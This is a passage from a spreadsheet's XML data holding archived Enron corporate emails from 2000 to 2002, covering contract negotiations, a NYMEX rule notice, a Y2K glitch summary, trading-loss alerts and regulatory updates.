MIR_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Thursday, May 31, 2001 11:32 AM_x000D_
To: Reuter, Marisa_x000D_
Subject: Re: ENA/NorthWestern: Certificate of Amendment &amp; Closing_x000D_
Checklist_x000D_
_x000D_
_x000D_
_x000D_
If there are any other resolutions, etc that they want, I would let them_x000D_
prepare them._x000D_
_x000D_
Thanks a bunch,_x000D_
_x000D_
Kay_x000D_
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_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 Feb 2000 05:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Gallup - Conversion Agreement Pricing</t>
  </si>
  <si>
    <t xml:space="preserve">The problem is back.  For a while I couldn't send an email to the wrong Steve _x000D_
even if I tried, but now the computer's doing its own thing again.  I'll try _x000D_
to remember to use "steven" but my recollection is that that didn't always _x000D_
work either.  Thanks.  DF_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 02/01/2000 _x000D_
01:35 PM ---------------------------_x000D_
_x000D_
_x000D_
Steve Harris@ECT_x000D_
02/01/2000 08:33 AM_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Gallup - Conversion Agreement Pricing  _x000D_
_x000D_
Drew, I've forwaded the "real" Steven Harris this e-mail.  I think the main _x000D_
problem w/ the e-mail _x000D_
confusion is the name ending (i.e. his is Steven and ends with an "n", and _x000D_
mine is just Steve w/ _x000D_
an "e").  Please update your address database for this change._x000D_
_x000D_
Thanks,_x000D_
Steve_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Drew Fossum @ ENRON                           01/31/2000 05:54 PM_x000D_
	_x000D_
_x000D_
To: Mark Knippa/HOU/ECT@ECT_x000D_
cc: David Foti/ET&amp;S/Enron@ENRON, Steve Harris/HOU/ECT@ECT, Michel _x000D_
Nelson/ET&amp;S/Enron@ENRON, Mary Kay Miller/ET&amp;S/Enron@ENRON, Mary Kay _x000D_
Miller/ET&amp;S/Enron@ENRON, Susan Scott/ET&amp;S/Enron@ENRON _x000D_
Subject: Re: Gallup - Conversion Agreement Pricing  _x000D_
_x000D_
Mark, I understand we need to act very quickly once we have turned you loose _x000D_
to price the swap.  I think this is a Harris and Nelson call, so lets talk _x000D_
tomorrow.  I'll look at the contracts again to verify our risks in locking in _x000D_
before we are 100% sure we are going ahead with the project.  DF_x000D_
_x000D_
_x000D_
_x000D_
Mark Knippa@ECT_x000D_
01/31/2000 04:27 PM_x000D_
To: David Foti/ET&amp;S/Enron@ENRON, Steve Harris/HOU/ECT@ECT, Drew _x000D_
Fossum/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Gallup - Conversion Agreement Pricing_x000D_
_x000D_
_x000D_
_x000D_
Just wanted to communicate that I contacted Drew earlier today to suggest that_x000D_
we check the pricing and execute the Conversion Agreement for Gallup.   As you_x000D_
guys know, the recent price valuation for deliveries associated with Gallup _x000D_
have been _x000D_
well below the earlier market quotes.  _x000D_
_x000D_
 Given the short term market reaction to the colder weather, we may be able _x000D_
establish_x000D_
prices similar to the earlier market quote.   Based on the response from Dave _x000D_
and Drew_x000D_
I have requested the pricing and hope to have that information by mid-day _x000D_
tomorrow._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 06:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>(00-392) CFTC Approval of Amendments to NYMEX Rule 3.47 ("Audit_x000D_
 Committee")</t>
  </si>
  <si>
    <t xml:space="preserve">Notice No. 00-392_x000D_
November 17, 2000_x000D_
_x000D_
TO: ALL NYMEX AND COMEX DIVISION MEMBERS_x000D_
_x000D_
FROM: Neal L. Wolkoff, Executive Vice President_x000D_
_x000D_
DATE:  November 17, 2000_x000D_
_x000D_
RE:  Notice of CFTC Approval of Amendments to NYMEX Rule 3.47 ("Audit=20_x000D_
Committee")_x000D_
_____________________________________________________________________x000D_
_x000D_
Please be advised that the CFTC has approved amendments to NYMEX Rule 3.47=_x000D_
=20_x000D_
("Audit Committee"), which are shown below and are now in effect.  The=20_x000D_
amendments add an additional Public Director and expand the duties of the=_x000D_
=20_x000D_
Audit Committee to encompass consideration of the information to be include=_x000D_
d=20_x000D_
in NYMEX filings to the SEC._x000D_
_x000D_
If you have any questions, please contact Michael Lugo, Vice President of=_x000D_
=20_x000D_
Internal Auditing, at  (212) 299-2268._x000D_
_x000D_
APPROVED AMENDMENTS TO NYMEX RULE 6.40A_x000D_
_x000D_
(An asterisk indicates deletions; parentheses indicate deletions.)_x000D_
_x000D_
Rule 3.47 AUDIT COMMITTEE_x000D_
_x000D_
(A) The Audit Committee shall be a regular committee and shall consist of t=_x000D_
he=20_x000D_
Chairman of the Board and *two*(three) Public Directors appointed by the=20_x000D_
Board.  One of the Public Directors shall serve as Chairman of the Committe=_x000D_
e_x000D_
(B) The Audit Committee shall:_x000D_
(i) *on* (On) an annual basis:_x000D_
(a) make a recommendation to the Board of Directors regarding selection,=20_x000D_
retention and discharge of independent auditors for the ensuing year; and_x000D_
(b) *(b)* review the scope and general extent of the independent auditors=_x000D_
=01,=20_x000D_
examination, the significant audit procedures which will be utilized, and=_x000D_
=20_x000D_
fees charged for their services._x000D_
((ii) Review the audited financial statements and discuss them with=20_x000D_
management and the independent auditors. These discussions shall include, b=_x000D_
ut=20_x000D_
not be limited to, the matters required to be disclosed under Statement of=_x000D_
=20_x000D_
Auditing Standards No. 61 (established by the Auditing Standards Board) and=_x000D_
=20_x000D_
consideration of the quality of the Exchange=01,s accounting principles as=_x000D_
=20_x000D_
applied in its financial reporting, including a review of sensitive=20_x000D_
accounting estimates, reserves and accruals, judgement areas, audit=20_x000D_
adjustments (whether or not recorded), and other such inquires as the=20_x000D_
Committee or the independent auditors shall deem appropriate.  Based on suc=_x000D_
h=20_x000D_
review, the Committee shall make its recommendation to the Board as to the=_x000D_
=20_x000D_
inclusion of the Exchange=01,s audited financial statements in the Exchange=_x000D_
=01,s=20_x000D_
Annual Report on Form 10-K._x000D_
(iii) Discuss with representatives of management and the independent audito=_x000D_
rs:_x000D_
(a) the interim financial information contained in the Exchange=01,s_x000D_
Quarterly Report on Form 10-Q prior to its filing; and_x000D_
(b) the results of the review by the independent auditors.)_x000D_
(iv) *(ii) on* (On) a monthly basis, or at such times as the Committee shal=_x000D_
l=20_x000D_
determine, but not less than twice each year, meet with the independent=20_x000D_
auditors, President, Senior Vice President of Finance, *Director* (Vice=20_x000D_
President) of Internal Audit and other personnel as the Committee deems=20_x000D_
appropriate to review:_x000D_
(a) the scope of the audit plan;_x000D_
(b) the Exchange=01,s financial statements;_x000D_
(c) the results of external and internal audits;_x000D_
(d) the effectiveness of the Exchange=01,s system of internal controls;_x000D_
(e) any limitations imposed by Exchange personnel on the independent=20_x000D_
auditors; and_x000D_
(f) such other matters as the Committee shall deem appropriate upon advisin=_x000D_
g=20_x000D_
the Executive Committee._x000D_
((v)) * review *(Review) the internal audit function of the Exchange,=20_x000D_
including proposed audit programs for the coming year, the coordination of=_x000D_
=20_x000D_
such a programs with the independent auditors, the extent to which=20_x000D_
recommendations made by the internal auditors or by the independent auditor=_x000D_
s=20_x000D_
have been implemented, and management=01,s response to the recommendations =_x000D_
of=20_x000D_
the independent *auditors;* (auditors.)_x000D_
(vi) *(iv)review,* (Review,)  at its discretion, compliance with codes of=_x000D_
=20_x000D_
conduct established the * Exchange;*(Exchange.)_x000D_
((vii)) * consult* (Consult) with the independent auditors, and when=20_x000D_
appropriate the * Director*  (Vice President) of Internal Audit, out of the=_x000D_
=20_x000D_
presence of management._x000D_
 * establish * ((viii)Establish) direct communication between the auditors=_x000D_
=20_x000D_
and the * Board; * (Board)_x000D_
((ix))* initiate* (Initiate,) at its discretion, investigations within the=_x000D_
=20_x000D_
parameters of foregoing responsibilities, and for that purpose with the=20_x000D_
approval of the Board, retain outside legal counsel, independent auditors, =_x000D_
or=20_x000D_
any other such experts as if may deem   *appropriate; and* (appropriate.)_x000D_
((x))  * report* (Report) to the entire Board at such time as the (Committe=_x000D_
e=20_x000D_
determines,) but not less than twice a year on the activities described in=_x000D_
=20_x000D_
this Rule._x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Please click on the link below to indicate you have received this_x000D_
email._x000D_
_x000D_
"http://208.206.41.61/email/email_log.cfm?useremail=3Dtana.jones@enron.com&amp;=_x000D_
refdo_x000D_
c=3D(00-392)"_x000D_
_x000D_
Note: If you click on the above line and nothing happens, please copy_x000D_
the text between the quotes, open your internet browser,_x000D_
paste it into the web site address and press Return._x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 13:52:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lorraine.lindberg@enron.com', 'kevin.hyatt@enron.com', 'audrey.robertson@enron.com', 'jeffery.fawcett@enron.com', 'michelle.lokay@enron.com', 'steven.harris@enron.com', 'lindy.donoho@enron.com'})</t>
  </si>
  <si>
    <t>FW: Surprise Party</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Audrey D. Robertson_x000D_
Transwestern Pipeline Company=20_x000D_
email address:  audrey.robertson@enron.com_x000D_
(713) 853-5849_x000D_
(713) 646-2551 Fax_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Garcia, Ava =20_x000D_
Sent:=09Wednesday, May 09, 2001 3:41 PM_x000D_
To:=09Berger, Larry; Buchanan, John; Zadow, Raetta; Kowalke, Terry; Bodnar,=_x000D_
 Michael; Blair, Jean; Carr, James; Daily, Leonard; Floyd, Jodie; Walden, S=_x000D_
hirley; Perry, Katherine; Brostad, Karen; Carter, Zuela; Steele, Patricia; =_x000D_
Trevino, Linda; Brown, Elizabeth; Dasilva, Esther; Hanagriff, Richard; John=_x000D_
son, Alice; Lee, Dennis; Eldridge, Dale; Green, Alma; Bastida, Nancy; Davis=_x000D_
, Larry; Vasquez, Josue; Lindley, Hilda; Carrillo, Alma; Cormier, Martha; A=_x000D_
ldinger, William; Clapper, Karen; Collins, Marion; Coon, Galen; Cooper, Tim=_x000D_
; Giambrone, Laura; Howard, Jack; Laferla, Lynda; Phillips, Mary; Cramer, J=_x000D_
ames; Kuehl, Toby; Betancourt, Ramona ; Medeles, Gerry; Matheson, Maggie; D=_x000D_
raemer, Mary ; Jaquet, Tammy; Black, Legale ; Studebaker, James ; Callans, =_x000D_
Nancy; Locknar, MaryAnn; Porter, Diana; Washington, Kathy; Wilkens, Jerry; =_x000D_
Bryan, Randy; McEvoy, Christine; Minter, Tracy; Ward, Linda; Hernandez, Alb=_x000D_
ert; Mulligan, Amy; Rivers, Cynthia; Dykes, Tangie; McDaniel, Janet; Sturr,=_x000D_
 Kathy; Woodson, Harry; Janzen, Randy; Scurlock, Debra; Adams, Jean; Forbis=_x000D_
h, Sherry; Benningfield, Robert; Greaney, Chris; Vasquez, Josue; Perez, Kim=_x000D_
; Ramirez, Pilar; Armstrong, Julie; Wehring, Linda; Robertson, Audrey_x000D_
Cc:=09Winters, Ricki; Green, Alma; Carrillo, Alma; Blair, Lynn; Corman, She=_x000D_
lley; Nacey, Sheila; January, Steven; Dietz, Rick_x000D_
Subject:=09Surprise Party_x000D_
_x000D_
=20_x000D_
_x000D_
Audrey, Pilar, Linda, Julie and Kim please forward if to your group._x000D_
_x000D_
Thanks,_x000D_
Ava</t>
  </si>
  <si>
    <t>Fri, 18 May 2001 09:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kdonohoo@ercot.com'})</t>
  </si>
  <si>
    <t>frozenset({'1cscworkinggroup@ercot.com', 'wms_etc@ercot.com', 'tac@ercot.com'})</t>
  </si>
  <si>
    <t>RE: CSC MRS Presentation</t>
  </si>
  <si>
    <t>Second try, this time with the attachement _x000D_
_x000D_
-----Original Message----- _x000D_
From: Donohoo, Ken _x000D_
Sent: Friday, May 18, 2001 4:47 PM _x000D_
To: 1 CSC Working Group; 1 WMS and others(Wholesale Market Sub.); 1 2001 _x000D_
TAC and others _x000D_
Cc: 1 MockMarket _x000D_
Subject: CSC MRS Presentation _x000D_
_x000D_
Attached to this email is a presentation made at yesterday MRS meeting.? The _x000D_
last slide indicates calculated TTC limits between zones for the on peak _x000D_
summer base case.? Have a great weekend._x000D_
_x000D_
? _x000D_
Kenneth A. Donohoo, PE _x000D_
Manager of System Planning, Technical Operations _x000D_
ERCOT _x000D_
2705 West Lake Dr. _x000D_
Taylor, TX 76574-2136 _x000D_
(512)248-3003, FAX(512)248-3082 _x000D_
_x000D_
? _x000D_
 - KenDCSCMRS7.ppt</t>
  </si>
  <si>
    <t>Mon, 24 Jun 2002 14:40:16 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'christina.finelli@enron.com'})</t>
  </si>
  <si>
    <t>RE: GISB Base Contract - Occidental Energy Marketing, Inc.</t>
  </si>
  <si>
    <t>christy,_x000D_
_x000D_
what is the status of the contract?  the possibly still exists that we may need to transact with oxy._x000D_
_x000D_
thanks_x000D_
robin_x000D_
_x000D_
-----Original Message-----_x000D_
From: Finelli, Christina _x000D_
Sent: Wednesday, June 19, 2002 10:02 AM_x000D_
To: Barbe, Robin_x000D_
Cc: Schneider, Chip; McMichael Jr., Ed; Germany, Chris; Concannon, Ruth;_x000D_
Darmitzel, Paul_x000D_
Subject: RE: GISB Base Contract - Occidental Energy Marketing, Inc._x000D_
_x000D_
_x000D_
_x000D_
Thanks Robin for the info.  We will get the GISB finalized so you can use it whenever you do need it._x000D_
_x000D_
Christy_x000D_
_x000D_
-----Original Message-----_x000D_
From: Barbe, Robin _x000D_
Sent: Wednesday, June 19, 2002 9:51 AM_x000D_
To: Finelli, Christina_x000D_
Cc: Schneider, Chip; McMichael Jr., Ed; Germany, Chris; Concannon, Ruth_x000D_
Subject: RE: GISB Base Contract - Occidental Energy Marketing, Inc._x000D_
_x000D_
_x000D_
_x000D_
christy,_x000D_
_x000D_
i spoke with chip this morning.  he said it was highly unlikely that anything would happen this week.  i still want to follow through with the contract so we will be ready to transact if necessary.  the sense of urgency has changed._x000D_
_x000D_
thank you for your help!_x000D_
_x000D_
robin_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Finelli, Christina _x000D_
Sent: Wednesday, June 19, 2002 9:17 AM_x000D_
To: Barbe, Robin_x000D_
Cc: Darmitzel, Paul_x000D_
Subject: RE: GISB Base Contract - Occidental Energy Marketing, Inc._x000D_
_x000D_
_x000D_
_x000D_
Robin,_x000D_
_x000D_
Just to let you know, we rehashed the GISB yesterday and sent our final comments to Occidental yesterday afternoon.  We have not heard back yet.  We needed to make sure we had provided for the fact you do not record, you want them to prepay, no netting,setoff, etc.  I also advised that ENA wanted to be the confirming party.  Hopefully we will hear from them soon as I am sure they want to start the ball rolling as soon as possible._x000D_
_x000D_
Will you need my help with confirmations?  I am glad to help you unless you have other sources, but we especially now need to have the written confirmations done, with the appropriate bankruptcy language._x000D_
_x000D_
Thanks again for your help._x000D_
_x000D_
Christy _x000D_
_x000D_
-----Original Message-----_x000D_
From: Barbe, Robin _x000D_
Sent: Monday, June 17, 2002 2:54 PM_x000D_
To: Finelli, Christina; Darmitzel, Paul_x000D_
Cc: McMichael Jr., Ed; Schneider, Chip; Concannon, Ruth; Germany, Chris_x000D_
Subject: RE: GISB Base Contract - Occidental Energy Marketing, Inc._x000D_
_x000D_
_x000D_
fyi,_x000D_
_x000D_
very few phone lines are recorded post petition.  my phone line is not.  we can send out a written confirm.  _x000D_
_x000D_
robin_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Finelli, Christina _x000D_
Sent: Monday, June 17, 2002 11:53 AM_x000D_
To: Barbe, Robin_x000D_
Cc: Darmitzel, Paul_x000D_
Subject: RE: GISB Base Contract - Occidental Energy Marketing, Inc._x000D_
_x000D_
_x000D_
_x000D_
Robin,_x000D_
_x000D_
I have reviewed the GISB sent by Occi.  The GISB between Occi and EES does NOT contain the special provisions contained in the within GISB.  I can tell them we want the wording exactly the same, but we are dealing with different types of deals._x000D_
_x000D_
The main reason EES was able to negotiate them out, was EES did not record.  EES prefers to have a written confirmation, does Wholesale?_x000D_
_x000D_
Paul, since Wholesale records, I would think that the second special provision would apply, and the first one certainly could or could not, depending upon whether this is the practice of Wholesale.  If this is merely Occidental's practice, then I will propose wording to change the reading to reflect that we do WANT all confirmations of less than one month to be confirmed._x000D_
_x000D_
The third special provision, can go either way, your call?_x000D_
_x000D_
The fourth provision, seems fine, again your call?_x000D_
_x000D_
Normally the pre-payment (by Occy) does not go in the actual GISB agreement.  I would like to have Carol Wilson insert our bankruptcy language right before the signatures on page one._x000D_
_x000D_
Also, I would suggest under confirming party on page one, that it read:  Enron Wholesale, unless you do not prefer to confirm, but I am pretty sure you do._x000D_
_x000D_
Let me know later._x000D_
_x000D_
Christy_x000D_
_x000D_
-----Original Message-----_x000D_
From: Barbe, Robin _x000D_
Sent: Friday, June 14, 2002 1:43 PM_x000D_
To: Finelli, Christina_x000D_
Subject: FW: GISB Base Contract - Occidental Energy Marketing, Inc._x000D_
_x000D_
_x000D_
here's the gisb.  thanks for your help._x000D_
_x000D_
robin_x000D_
37177_x000D_
_x000D_
-----Original Message-----_x000D_
From: Carol_Wilson@oxy.com [mailto:Carol_Wilson@oxy.com]_x000D_
Sent: Thursday, June 13, 2002 3:24 PM_x000D_
To: Barbe, Robin_x000D_
Subject: GISB Base Contract - Occidental Energy Marketing, Inc._x000D_
_x000D_
_x000D_
Robin,_x000D_
_x000D_
How are you doing?  It has been a few years since we've seen each other._x000D_
John Fitzpatrick asked that I send to you the GISB contract for your review._x000D_
If you will complete the information on the right-hand side of the first_x000D_
page and email back to me I will prepare originals for execution._x000D_
_x000D_
Let me know if you have any questions._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
 &lt;&lt;GISB-new.DOC&gt;&gt; _x000D_
_x000D_
Carol Wilson_x000D_
Occidental Energy Marketing, Inc._x000D_
Tel. # 713-215-7182_x000D_
Fax # 713-215-7486_x000D_
carol_wilson@oxy.com</t>
  </si>
  <si>
    <t>Wed, 20 Jun 2001 00:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.shankman@enron.com', 'rick.buy@enron.com', 'mike.mcconnell@enron.com', 'ted.ii@enron.com', 'greg.whalley@enron.com', 'cassandra.schultz@enron.com'})</t>
  </si>
  <si>
    <t>PRELIMINARY Global Products 5 Day Loss</t>
  </si>
  <si>
    <t>The PRELIMINARY DPR reflects a 5 Day Loss Notification for Global Products in _x000D_
the following amount:_x000D_
_x000D_
  Limit  -  ($18,750,000)_x000D_
_x000D_
  5 Day Loss -  ($19,108,000)</t>
  </si>
  <si>
    <t>Thu, 21 Jun 2001 06:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Well, it's sort of an apology...</t>
  </si>
  <si>
    <t>Lockyer writes a very belated letter to the LA Times---"regret" of the slimy _x000D_
variety:_x000D_
_x000D_
My comment about introducing an energy company executive to the ugly reality _x000D_
of a prison cell was repeated recently by columnist Peter King (June 10) and _x000D_
has become fodder for commentaries that suggest I might think that prison _x000D_
rape is proper punishment for criminals. _x000D_
My anger over the activities of energy barons doesn't come close to my _x000D_
lifelong outrage at the crime of rape. As attorney general I significantly _x000D_
reordered my department's priorities in order to complete the DNA offender _x000D_
database this year. I also sponsored new laws to help fight rape crimes. My _x000D_
office prosecuted prison guards charged with encouraging inmate rapes at _x000D_
Corcoran State Prison. _x000D_
I guess I let my anger get the better of me in talking about the mercenary _x000D_
corporate executives who are making life so miserable for millions of _x000D_
Californians. I should have made my point--that even the most powerful _x000D_
corporate executives are not beyond the law--without the crude remark. _x000D_
Bill Lockyer _x000D_
Attorney General _x000D_
Sacramento _x000D_
_x000D_
&lt;http://www.latimes.com/print/editorials/20010620/t000051044.html&gt;</t>
  </si>
  <si>
    <t>Sun, 2 Jan 2000 05:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'joseph.sutton@enron.com', 'kelly.kimberly@enron.com', 'philippe.bibi@enron.com', 'mike.mcconnell@enron.com', 'mark.palmer@enron.com', 'mark.koenig@enron.com', 'richard.causey@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Summary of Y2K Glitches</t>
  </si>
  <si>
    <t>Following please find a summary of the minor Y2K related glitches that=20_x000D_
various business units experienced following the rollover.  As you can see,=_x000D_
=20_x000D_
the problems we encountered were minimal indeed.  Testing of less critical=_x000D_
=20_x000D_
functions is ongoing and will continue through normal operations._x000D_
_x000D_
_x000D_
Enron Europe_x000D_
ETOL - Power Station Optimizer application is not accepting data.  The=20_x000D_
application is used for informational purposes only, and has no control=20_x000D_
functionality.  Operations are not affected.  ETOL will have the applicatio=_x000D_
n=20_x000D_
repaired early next week._x000D_
_x000D_
London - Enpower Europe deal selection criteria is not working with date=20_x000D_
criteria.  The application does function with deal numbers, however.  The=_x000D_
=20_x000D_
Houston application team is currently working on the problem.=20_x000D_
_x000D_
London - Global Products Accounting has a minor data import problem.  The=_x000D_
=20_x000D_
problem does not impair daily operations.  Repair date is set for January 4=_x000D_
._x000D_
_x000D_
Enron House - Fire detection system alarm lights do not turn off following=_x000D_
=20_x000D_
tests.  The problem is cosmetic only.  Also, remote alarm systems skipped=_x000D_
=20_x000D_
forward to the date January 31, 2000.  It is believed the problem is also=_x000D_
=20_x000D_
cosmetic only._x000D_
_x000D_
EOTT_x000D_
Ticketing entry system had a minor problem which has already been repaired._x000D_
_x000D_
General ledger application has a program that displays the year 1900.  The=_x000D_
=20_x000D_
extent of the issue and whether the problem is cosmetic only, is being=20_x000D_
pursued._x000D_
_x000D_
International Regions_x000D_
Transredes, Columbia - The pipeline SCADA (Supervisory, Control, and Data=_x000D_
=20_x000D_
Acquisition) system failed shortly after midnight.  This means the pipeline=_x000D_
=20_x000D_
control center is not automatically receiving pipeline information.  The=20_x000D_
system is used for information purposes only and has not affected operation=_x000D_
s._x000D_
_x000D_
Enron North America=20_x000D_
ENA - Enpower deal selection criteria is not working with date criteria. Sa=_x000D_
me=20_x000D_
as item two of Enron Europe. ENA has already repaired the problem for North=_x000D_
=20_x000D_
American operations. Currently discussing European implementation timeline._x000D_
_x000D_
ENA - SIFT application has a Microsoft Import problem. This process is not=_x000D_
=20_x000D_
critical to daily processes conducted by Global Products. Same issue as Enr=_x000D_
on=20_x000D_
Europe item three. Repair date is January 4._x000D_
_x000D_
FacSys 4.1 passing wrong date, 01/01/100 instead of today=01,s date of=20_x000D_
01/01/2000, to the fax machine which prints on the banner information.=20_x000D_
Remediation scheduled before January 4._x000D_
_x000D_
Remediated three Excel macros in the non-commodity trading function.</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 07:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tom.briggs@enron.com', 'linda.robertson@enron.com', 'james.steffes@enron.com', 'carin.nersesian@enron.com', 'richard.shapiro@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Report on Energy and Commerce Status (Ignore Earlier E-Mail That_x000D_
 Was Not Complete)</t>
  </si>
  <si>
    <t>Confirming earlier indications, at about 3 pm EDT today, Chairman Tauzin _x000D_
convened the committee to issue a joint statement with Rep. Waxman and then _x000D_
recessed the committee subject to the call of the chair following the _x000D_
Memorial Day Week Recess.  Congress will not return until the week of June 4, _x000D_
but staff level discussions will likely occur after the three-day weekend._x000D_
_x000D_
Chairman Tauzin said that the committee is receiving conflicting information _x000D_
on the facts in California.  He said it is better to take a little longer to _x000D_
get the facts straight and evaluate various options, rather than act quickly _x000D_
but in the wrong way.  He did say he expects that the committee will come to _x000D_
a bipartisan agreement after the recess._x000D_
_x000D_
Behind the scenes, we hear that Democrats appear not to want to reach an _x000D_
agreement, instead preferring to keep the issue alive.  Republicans, on the _x000D_
other hand, want to spare their vulnerable West Coast Members another _x000D_
recorded vote against price caps.  Thankfully, following our collective _x000D_
efforts yesterday, the discussion has moved off of the 80/20 long term _x000D_
contract requirement.  Republicans are poised to offer the Ose bill as an _x000D_
alternative for discussion and amendment if an agreement is not reached.  The _x000D_
Ose bill would extend FERC's pricing formula to 24/7 and throughout the West._x000D_
_x000D_
Staff report that Members were far from agreement and that no one concept was _x000D_
embraced for further refinement.  It does appear, however, that some Members, _x000D_
such as Rep. Mary Bono (R-CA) are pushing for some type of price mitigation _x000D_
that they can vote for.  With Republicans increasingly worried about the _x000D_
political impact of the energy issue, we will need to continue our work next _x000D_
Tuesday, starting with an in-depth analysis of the Ose bill.</t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 09:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Online Weather Trading</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, to North America, Australia and Japan._x000D_
_x000D_
_x000D_
_x000D_
	Karen Lambert_x000D_
	09/07/2000 04:30 PM_x000D_
		_x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Online Weather Trading_x000D_
_x000D_
Does this apply only to the North American contracts and weather trades for _x000D_
which you are responsible?  _x000D_
Does the instruction below apply to Australia and Japan ISDA's?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: Tana Jones on 09/07/2000 12:17 PM_x000D_
To: Frank L Davis/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT, Scott _x000D_
Tackett/Corp/Enron@Enron, Tom Moran/HOU/ECT@ECT_x000D_
cc: Mark Taylor/HOU/ECT@ECT _x000D_
Subject: Online Weather Trading_x000D_
_x000D_
Per my conversations with Mark Taylor, we should continue to put any weather _x000D_
trades done online under any relevant master agreement with the _x000D_
counterparty.  Further, there is no prohibition against doing a trade online _x000D_
with a counterparty when we do not have a master in place.  Any non-master _x000D_
trades would go under the respective GTC.  It appears to be only a _x000D_
coincidence that we are trading online only with counterparties we have _x000D_
masters in place with._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Feb 2001 09:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Co Op City EPC contract</t>
  </si>
  <si>
    <t xml:space="preserve">Kay, I take no exception to the changes.  I see where we have included a down _x000D_
payment requirement.  From EECC's perspective this is a good point.  I assume _x000D_
that Mark is ok with it._x000D_
_x000D_
Will you or Mark forward the document to the customer or do you want EECC to _x000D_
do it._x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann_x000D_
	02/07/2001 05:33 PM_x000D_
		 _x000D_
		 To: Robert Sevitz/NA/Enron@Enron, Randy Pais/Corp/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Co Op City EPC contract_x000D_
_x000D_
Here 'tis:_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 09:55:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({"justin.o'malley@enron.com"})</t>
  </si>
  <si>
    <t>i'm a dirty boy, a dirty, dirty boy</t>
  </si>
  <si>
    <t>Tue, 29 Jan 2002 06:18:29 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kathy.reeves@enron.com', 'c..kenne@enron.com', 'brian.gillis@enron.com'})</t>
  </si>
  <si>
    <t>RE: ECC - Riskmantra counterparties</t>
  </si>
  <si>
    <t xml:space="preserve">After speaking with Kim Theriot in confirmations, we will not be using the RiskMantra entity, per the legal department.  All Canada to US deals should be booked ENA to ECC (using the new legal entities of course) rather than RiskMantra.  She is waiting on the final word about our new legal entity names, I will let you know what I hear. _x000D_
_x000D_
Thanks_x000D_
_x000D_
Kam_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Gillis, Brian  _x000D_
Sent:	Monday, January 28, 2002 3:59 PM_x000D_
To:	Kenne, Dawn C.; Keiser, Kam; Reeves, Kathy_x000D_
Cc:	Lozano, Melba; Sweitzer, Tara; Denny, Jennifer; Meredith, Kevin_x000D_
Subject:	RE: ECC - Riskmantra counterparties_x000D_
_x000D_
Dawn,_x000D_
_x000D_
At this stage, I haven't heard any indications we wouldn't continue to operate this way.  _x000D_
_x000D_
One important thing here is that this 2 leg logic was never applied to the US counterparties we deal with - so we end up having to book a second leg on any deals we do with a Houston counterparty in EOL.  Since this was obviously considered to be worth doing for the US, I don't see why we wouldn't do it for Canada too - it would be a significant time saver._x000D_
_x000D_
Brian_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kenne, Dawn C.  _x000D_
Sent:	Thursday, January 17, 2002 2:46 PM_x000D_
To:	Keiser, Kam; Gillis, Brian; Reeves, Kathy_x000D_
Cc:	Lozano, Melba; Sweitzer, Tara; Denny, Jennifer; Meredith, Kevin_x000D_
Subject:	ECC - Riskmantra counterparties_x000D_
_x000D_
Kam, Kathy and Brian,_x000D_
_x000D_
Concerning the ECC - Riskmantra logic that EOL has in place to convert the transactions that are done with counterparties with ECC master agreements...are we going to continue this way of booking (2 legs)?  If so, can you review the list of counterparties that follows the "2-leg" logic and let me know if there need to be any additions or deletions?_x000D_
_x000D_
Thanks,_x000D_
Dawn_x000D_
_x000D_
 &lt;&lt; File: ECC counterparties.xls &gt;&gt; _x000D_
</t>
  </si>
  <si>
    <t>Sat, 19 May 2001 06:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Energy Operations Response to 1998 to 2001 Headcount Changes</t>
  </si>
  <si>
    <t xml:space="preserve">Steve, FYI_x000D_
The attachment below indicates substantial expected growth for EWS Energy _x000D_
Operations for 2001 of 160+ or 29%; in 2001, there's a net growth of 50._x000D_
_x000D_
 -----Original Message-----_x000D_
